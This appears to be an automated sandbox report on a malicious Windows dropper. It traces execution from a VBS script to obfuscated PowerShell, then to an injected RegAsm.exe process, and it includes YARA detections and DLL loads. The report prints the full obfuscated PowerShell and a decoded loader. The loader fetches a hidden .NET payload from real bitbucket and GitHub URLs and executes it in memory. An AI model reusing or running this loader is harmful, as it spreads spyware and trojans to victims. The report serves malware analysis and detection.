#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Code function: 0_2_00007FF7D6FD2C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Code function: 0_2_00007FF7D6FD1C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Code function: 0_2_00007FF7D6FD1D28
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Code function: 0_2_00007FF7D6FD5D90
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Code function: 0_2_00007FF7D6FD6CA4
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Code function: 0_2_00007FF7D6FD2DB4
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Code function: 0_2_00007FF7D6FD66C4
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Code function: 0_2_00007FF7D6FD40C4
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Code function: 0_2_00007FF7D6FD3530
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Code function: 0_2_00007FF7D6FD1C0C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7DC74
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_068A67D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_068AA3D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_068A3F50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_068A6FE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_068A6FF8
                  Source: sRMytgfRpJ.exe Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 8078 bytes, 1 file, at 0x2c +A "fqt.vbs", ID 708, number 1, 1 datablock, 0x1503 compression
                  Source: sRMytgfRpJ.exe Binary or memory string: OriginalFilename vs sRMytgfRpJ.exe
                  Source: sRMytgfRpJ.exe, 00000000.00000000.1743361084.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs sRMytgfRpJ.exe
                  Source: sRMytgfRpJ.exe Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs sRMytgfRpJ.exe
                  Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 4484
                  Source: Process Memory Space: powershell.exe PID: 7476, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 7664, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 6.2.powershell.exe.116a6201750.0.raw.unpack, SimpleZip.cs Cryptographic APIs: 'CreateDecryptor'
                  Source: 6.2.powershell.exe.116a6201750.0.raw.unpack, SimpleZip.cs Cryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.116a6201750.0.raw.unpack, SimpleZip.cs Cryptographic APIs: 'TransformFinalBlock'
                  Source: classification engine Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@14/13@3/4
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Code function: 0_2_00007FF7D6FD473C CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Code function: 0_2_00007FF7D6FD1C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Code function: 0_2_00007FF7D6FD6CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Code function: 0_2_00007FF7D6FD5D90 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c fqt.vbs
                  Source: sRMytgfRpJ.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                  Source: C:\Windows\System32\cmd.exe File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: sRMytgfRpJ.exe ReversingLabs: Detection: 13%
                  Source: unknown Process created: C:\Users\user\Desktop\sRMytgfRpJ.exe "C:\Users\user\Desktop\sRMytgfRpJ.exe"
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c fqt.vbs
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz
#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: feclient.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeSection loaded: advpack.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
